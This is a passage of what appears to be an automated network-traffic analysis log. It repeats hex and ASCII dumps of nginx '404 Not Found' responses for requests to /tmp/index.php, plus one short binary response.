34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:37:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:38:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:38:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:38:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:38:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:38:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:38:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 